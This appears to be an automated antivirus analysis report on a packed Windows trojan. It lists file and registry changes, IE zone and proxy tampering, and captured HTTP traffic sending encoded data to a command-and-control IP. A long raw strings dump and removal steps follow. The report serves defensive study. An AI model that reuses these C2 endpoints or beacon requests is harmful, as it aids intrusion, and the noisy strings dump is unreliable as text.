MD5: b14c438e5457723d7f8cd445b3d69401
SHA1: 48da1d1b3a2281fb59aa745b7466dd1316e55929
SHA256: b6dde1e3f56b5eab25a35c41e395a955f46e2051f2b2994cd755a48c3ea5214e
SSDeep: 49152:I0GEd/4JQfz5prnQ54QozUZnRQtA4NRrfX8DRGc1yUJGRyZU1c/SjrRNmNC44s9e:IVoJftJi4anRQmYrfM4coUBZ5i l
Size: 3862528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Fusion Install
Created at: 2014-06-04 10:34:07
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:208

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)

Registry activity

The process %original file name%.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 6B C5 B4 5B 9D 0D 06 A1 75 0A AA DC D8 C2 28"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://221.123.147.73/111.asp?post=/33333.mdb2412511990317927241251123456789&2014304352632430223310325223122613267326
hxxp://221.123.147.73/piaoyh.aspx
hxxp://221.123.147.73/111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3..

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 221.123.147.73

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 23 Jun 2014 23:58:01 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 1

Content-Type: text/html

Set-Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK; path=/

Cache-control: private
2....


POST /piaoyh.aspx HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://221.123.147.73/piaoyh.aspx

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Content-Type: application/x-www-form-urlencoded

accept-languge: zh-CN

Accept-Encoding: gzip, deflate

Host: 221.123.147.73

Content-Length: 12

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK

p=97E121E98E
HTTP/1.1 200 OK

Date: Mon, 23 Jun 2014 23:58:05 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=gb2312

Content-Length: 32
00280096003A009600E1002800EE003A....


POST /piaoyh.aspx HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://221.123.147.73/piaoyh.aspx

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Content-Type: application/x-www-form-urlencoded

accept-languge: zh-CN

Accept-Encoding: gzip, deflate

Host: 221.123.147.73

Content-Length: 191

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK

p=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E101E100E&sbm=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E51E51E51E50E58E58E50E49E50E50E
HTTP/1.1 200 OK

Date: Mon, 23 Jun 2014 23:58:11 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=gb2312

Content-Length: 339
54E60E63E52E56E54E58E50E121E81E109E109E110E102E46E115E107E107E101E95E1
24E51E51E51E50E58E59E126E50E50E66E66E50E75E63E52E57E64E69E64E52E60E76E
50E69E67E64E55E126E94E120E119E100E126E48E51E67E75E58E67E52E52E59E65E68
E73E60E52E71E50E71E70E65E58E78E48E125E49E65E66E51E62E73E55E55E59E59E69
E65E61E60E68E49E70E66E58E55E50E58E50E50E51E70E55E64E118E56E....

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

@.vmp0

`.vmp0

`.vmp1

g.EM^V7Z

EweB

e%f'G

.OO??b

cS.NO

.fF~p

EV.OrE

X%fqwE

$ÿ'

òDC

.nO? 4

M.Osc

}m.Bb~??

.GFfz

k.bsSw

Wn.QRA

.EEh(

b:\yL

\m.RB

]DU.Nmn

Vm.BCP
3t5%f
.RQQA
e%F'G
>.NbC_
d%f'Kk
>..QQm
T.pO`x
MM.oO
t$(SSh
~%UVW
u$SShe
kernel32.dll
shlwapi.dll
user32.dll
ntdll.dll
ole32.dll
WinINet.dll
Wininet.dll
CreateWindowStationA
CloseWindowStation
ExitWindowsEx
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
GetAsyncKeyState
GetTcpTable
CreatePipe
MSXML2.XMLHTTP
Microsoft.XMLHTTP
MSXML2.ServerXMLHTTP
MSXML2.ServerXMLHTTP.6.0
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
application/x-www-form-urlencoded
Freestyle.exe
config.ini
1000000001
http://221.123.147.73/zhuzhou.txt
drivers\etc\hosts.asp
&SQL=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
http://
1.ini
2.ini
3.ini
4.ini
.Aqwertyuiopasdfghjklzxcvbnm
c:\11.bmp
C$%cmb
.ppM|
 aZ.mO
%-^
.hk;~
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
%System%\SkinH_EL.dll
%u y2
0.du./
.K.cW
}.Dkn
OkC.xL
%System%\esdpf.she
1990317927
@kernel32.dll
90*('$$-
1-TOUCH PASS
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
http://dywt.com.cn
service@dywt.com.cn
 86(0411)88995834
 86(0411)88995831
Windows
(ESPINN.dll(NN
This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit www.dywt.com.cn/info
CallerInfoCopyCmd
SetIPPort
GetIPPort
"C:\Windows\System32\ESPI11.dll"
ProviderInstallCopyCmd
SockDataCopyCmd
SockAddrCopyCmd
enetintercept_fnSockAddrSetIPPort
enetintercept_fnSockAddrGetIPPort
enetintercept_fnInstallCopyCmd
enetintercept_fnSockDataCopyCmd
enetintercept_fnSockAddrCopyCmd
enetintercept_fnCallerInfoCopyCmd
%s\ESPI%d.dll
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
www.dywt.com.cn
X-X-X-X-X-X
%ld
0000%d
EMSG
Recv Sub Packet(%s)..
Recv Packet (%s)...
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
%d%d%d
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
 (&''&(,
*%).--.)%$
#include "l.chs\afxres.rc" // Standard components
>6n.Rr:,
WEBh
D$%%f&G
Vm.BB
|f.oz
n.nn/
5vBN.rR,
5%FWq
],.yx
.fJ&7
.GhX3
H,.sS
-DEYZ}
H
>.Nb!V
;
5-%%FjZ
 l%fG
J.fWvVg
_, 792:"
$EE%f
:#Sz%u
n.Rr:$
l%uJ8
%fz[&
7Ww%f
%f:El3
.Rr: EP
.RB%eU
=-.Bb
.OscF6Vj^j
,LM.OP
J*.nB
.OscF&
.N.op
.RJK;
hI%ul
yf.oz
t!:%su
ÿ6w
Kn.BQ
6.Or:
-Aa}=
6.EEh
:$X-0}|
%0xpu
*b.ar3
CD%%F
)>.Oc
 #-mx}
W:\Jn
.Nr:%
.oz(~
N:%xI
Q:%ss
|\:%u;
{m:%f
4X:%dW
%Xym:%X 
v!:%S
:%CX7
.RJBCC$e
cS.gH
%FjZ54
z%f::5\
-.RQP
w%Fj::
6:|s.vr
t5%fz
DU.nE
n.RQQA
.PXjk-z[
SQL F
%fwe%
.FfVw5
M.RB%>
eE%f'
~V.Nrb
.RR:8|p
.FFZE
.Os4:&
D$ B!.Wh
,=>("{[->
~|/f.yx~;
.Rr:>
-.RSw
ôt:>
ymEÿ
N.Rs:>
.pweo
.ol0c
ev.NLL
l-M.Nr3:?z
:?e%fw
..op0
.Osc>V
6.NqE
N%fwE
D$$%u
bX*%u
m.NOs
%.RcDh
 e.fF
!n.RB
%~
.WE}]-G
D<45ò
-i1l}
llzCJ%U
-=N.RB
.fGk O:2
*N.RB
v.OEO<
3.um.
^,0<83:2
[]M.By^
?:3E.WhH
.LCT-
%Fj:3(
m.nNn
.Rr:0
mK.CQe
D$$1%x4
%Fj :0R
.inzE
5%fz;W8
b"Cc$%f&
 n)|.CU
e\.YvRc
#D%%F
.N.nO
rM.nn
w%F:6.
.Pa!EDD4
KV.Xi
m..nOp
~n*%uNg
.EEYYm
.RB%>
 :.Ne
%Fj:6
.FfV12
m.Nrb
}m.Bv
_,6<92:4
$.Oc9
#c$%F
Zn.BQ
n.RS:2
ÿ##G7
E5.ws
&J:.ff~
.NbBV
=N.Rk
?cS6.nOsc
D$ (%9U
cDd%f
.OP0T
D$<7%s4
x%fYj
.Nq2FM
mn.vaV
7.gVg:
d%FG'
.QRvf
.KPay
*%u-,D
.Egio
uU.fe
N.RB6n.
} m.Os
n.yasw/@
-.Rr:
"cd%F&
.Nrjk[
K$..BV
.Ok &
Jn.RB
.Nj*N\
^*.af
H E%8x@i
,\m.RB
*=$H
%FjZ5
D$,%c;2
.Vgff
D$<1%x4
V.-e}5
L|.yh 1q
"3t|.yP
V.Vhm
l-.RB
.oOs4
.Jkiz
?.hizS
%F'gg
D$$%s
.nh7F
öWk
.Ey%FN
.LePa
.Nrb=VwO
)Jm.RB
.ajBS
%XltIl
.mAdx#
!,;2%Dkr
.AXO>]lyOd
%FH7f
2u!63%f
5J@Ü
#d.NHF
&.Vx}
jJ%8x
WINMM.dll
WS2_32.dll
GetWindowsDirectoryA
WINSPOOL.DRV
UnregisterHotKey
RegEnumKeyA
ShellExecuteA
)~.cQ
d3%6x
]Qo@%x
È~qJ
.Rv}#
&/%x0p
J.rhd
*.VP=
LF.LF
CreateDialogIndirectParamA
SetViewportOrgEx
@.vl]
^6a.yUZ
?X.bry
.qL@.^H
.ntPrN
`-21$%DH
 .GK`,/
' .,5?9@'
wgio.kj
(.KI*\
'.nU'6
$^0(4635
-in}I
_^.go
KRQU.Xb
.-(263?@
% -46?>@
7bn.pu
\v\.ad
e !%F
%uLqs~X
%gm.ku
8L.Xh_e
?=E.OV
[%c{H
FJOQ.UV
WeBn
fk-hmpx}
hudp
~"$!-(1<
$p.to
HO.NR
jh.ry
.KYHq
WAw]%XX] 
'"/8-.*, 
?WZ.Xa
%X$)13
%F"@:
$-164138
Y].cf
`l.mw
]`eik.om
e(#&.OJ
#(0352>:
MKS.VQ
".ODA
DKR[f.no
GAC.IM
1;GCE.NIhHK
OEXe
~72K.dH@
68=;V<.GK(NV]^Z
zY.hL
.AqVm
POo>.hJ
.pl/)T
;D.jy!
oi4.YS
Wl.MYH
"=N.CHC
=T%Xz3
E.tO{I
PZfoO.aN
.jueI
O0.Ya
.Nk/}
2.NrO
1.ZT[
QA.tB
.my.(
J[.TO
KR.kQ
.WWQeJ
.DHtS
%UGNV
/(X.bl
.XEU^
%x9}o
H%sia
.miQ,
%d`;L'iCN
q.xCg
B:\8o@
.gr=6Z
WININET.dll
RegDeleteKeyA
ADVAPI32.dll
InternetCrackUrlA
OLEAUT32.dll
SetWindowsHookExA
RegisterHotKey
GetViewportExtEx
RegOpenKeyA
6u!'$%f
RASAPI32.dll
.CxeYi
The procedure entry point %c could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
GetProcessHeap
InternetCanonicalizeUrlA
OffsetViewportOrgEx
WinExec
@0@@@8@ @
=.lh4.
S%XQ([H
DI.UQ
# ,) 126
X".CO
xD.COX
W.hp@
^`.mk
9.AE`DHQW
WG.alq
/'%SzW
%&#/.(51
70>;:@/,
e.oh/u
/I.OO
%.ORs
.mdxp
Y%u(p
b615?GM.PY
Jp$.OLD
b%sMn
"!@'#,19
3S.OG
.KT`_fcd
:v=D.OJ
a.zx(
%Dx*R 
\.xR@
.ns)zx
7ce.nw
0%FIPF
.;.ibi
.OzHo=1
n'.KR
%xRWU]
8?>7D.IW
v16.JX
HVZ.XY
*-0,(53?]
"*/4368.GJf
ib.mT
4M.YH
4Y`en.oi7
.!)`5<8:
.gl#(
bKeY
 01?F@I.OT
(.HSO
$&!  517
{@'(3251?&
Ê1(*
f.EK0
!,. 3(2;8'"
Î@I
ef.kn)q{5
t-.WD
.DC_)@q
$!-.43<)
.XHm_
u_bnw.rz
.)689?;>
' .(6740
Bk.wv
.pyP}
9
Y`.mt
[%/-08=?
!o.XJA|,
[y%.Pas
` ðA
%Fj>j
T^\_[X.dnF
3.ePf
$! '#,0:
!*/)6.5<
MU]fa.gl
ZY.KJ
XZ(.TL
H:.woz`
UWP]aio.np
V8.EC
& #(1159
.6?<.GI8KLJQR
#/0)4265
.GDe(d
~B.Fg
`.joxpsqr
Q.upeK
-Xd},
,4>8EAL.MV
 .HqK
5'".ME
" !-)72?
.ovxnr~
gV`.jp
p5T24V=.DCJM
n/.ON
*.,/521=
j(/)0=.FD@HMITUq5
"j%FP
!  -1427<
t%Do}4
;.EMV
.b.OU
BDL.VSIXc
| "/, 536=>:
$".745>6
?9CK.WZ
mlknj.vw
Ygb.nw
.jWZ4
%fjb1
.LS[Z _bed
1!#*5:3<
%xC1i<
.rut_y
}].bn
fK.SW
T^.dm
.tYy}
709@.CO
\^Bo?
$!#,(*07>
v}.xz/
-4xy}
it.QK
]#%FH
gf`ko.jw
\elji.vy
QSWUZfl.it
)61732;<
n.VQ \fnlio)
}%c{H
u.dGLXT
l36>:FI.WPPRUvy
.CNAg
0.sr(
Zb.ls8yz
sT.Zf
gcU%S2'
`.y%x
.ks@}{z
ssh!:
FEKV.ST
) -.03:;0
%xQAT
p).GB
{UPRFi.mk
# ,$.OH
MO.JN7
%xFMn
c%Xx[
X%upD
2801547
.DJ',
!( .zO
_t5\Q.Wc
%x")46
e"%FJ
!O%sn
#'%D-,0
%$0&.)/(
{'#%Dn
#&,835>;@
XX%5Xi0
b%.OU3
JLRU.Ze
".IS$v
`%up'
V\.Yg
B&%XP
ZacVo.puJr
j>E.IV
& %/ 14=
(".cN
$ ' %, 6
'.IOPu
" %(0?@.JI
,.(653;>
JSX]f.geXadko
.qz[d
D,R%c
.GN /6
 .OS9
^.af@glvrp
RYec.dj
@DM.KQq\[
! @6;9=8
%uvw~
', -758:
.) 2621`^@
z(.yx
[_bad.lj
DIM.WUh_x~
\Xbn.qsJt3
Q=A.DO
.[g`.dc1o
#"(41 5:89<;
=D.EB
.nx9;8
RVZed.giYr~-
. %8,-/.*
HJLK.RW@S\flm
9# y.YD
W.dJ;
%#'&-7?.9;
&#*.aX
FCJLU.PQ
i.(.IK
,`.Ka
!0 -) .(
TXgcli.ohPupz
]`ackop.wy
8.ZP.xe
~y%xE)
_ "-/751
;%u4DH
.jqt'
@.EOUS
EAF.LT
crp.uy
GJ.IN
TZc.di
(W.jR_'
cE&
a.hl9qu
!9=AI.SZ]
& /.zO(
.DQ(A*
% .GJlP}
|]%x`
il.kv
-c.kd
|FK.cq
N1%f!
$-.)0;=:
/, 709=;
.RY{zc
\a.eiSv&$e
Q]f.gc
3O.kG
i".GA
* /7<98`
.HJhV
d.muhqy
(598;?8'
eo.rt
.emhoknr
lO%cJ
 /$312;@
%sKCP
%s/u?~)
em.qubzOf
.yM@bo
NLM.VY8akmlq
RPSYd.ei8s{}
$d$.OI@
'.RSo
!./53<>_
3=?D.BI
jF.Ic
R@.rl
'! )/.21
QX[d.lj(pr
:@FHVQSQL
DBEIS^c.bj3o?
;A.BK
ec.ljVnD
3.SO^
-*.OV
/6e%x
IR_.Yc
sv.wq
,-14>?=5
T\ef.jh
o$)70;.BJ
_.abPmrqpp_y
urlx{
|G.fa
.XK(v
as7%U=
VP^.YaXgn
`cjo.kh
<",)/*7|
6Yp%U
{B.AG
LQ^ab.nh
# ")7065
 -71500.
R .ghIor='
sk.tp8wy
o.IGMgF<
h.Nf O
.Bx$ 
! )0.*179
&,7?D.AB
DBusSql
SVZgckj.hvh
@.HPW
& #"(58:`
$#/:*,25
%Xi&_l
%fPNk
?=:GOQT.ZX
_%x!6
ýS?
SXcakr.wq
YX\.ag
$.OWd
!'#$/. )63?9;
.jF,1
$,.15<@)3
M.SR#_
\'%-.59;
[!.SN
RegOpenKeyExA
comdlg32.dll
iphlpapi.dll
SetViewportExtEx
GetViewportOrgEx
KERNEL32.dll
.ILWj}
SHELL32.dll
ScaleViewportExtEx
UnhookWindowsHookEx
GetCPInfo
GetKeyState
-N}MD
RegCreateKeyExA
.IHC6a
RegCloseKey
1, 0, 6, 6
(*.*)

%original file name%.exe_208_rwx_009BC000_00002000:


WININET.dll
RegDeleteKeyA
ADVAPI32.dll
InternetCrackUrlA
OLEAUT32.dll
SetWindowsHookExA
RegisterHotKey
GetViewportExtEx
RegOpenKeyA
6u!'$%f
RASAPI32.dll

%original file name%.exe_208_rwx_009BF000_00001000:


The procedure entry point %c could not be located in the dynamic link library %s
USER32.dll
The ordinal %u could not be located in the dynamic link library %s
GetProcessHeap
InternetCanonicalizeUrlA
OffsetViewportOrgEx

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
   %System%\SkinH_EL.dll (88 bytes)
   %System%\esdpf.she (20 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.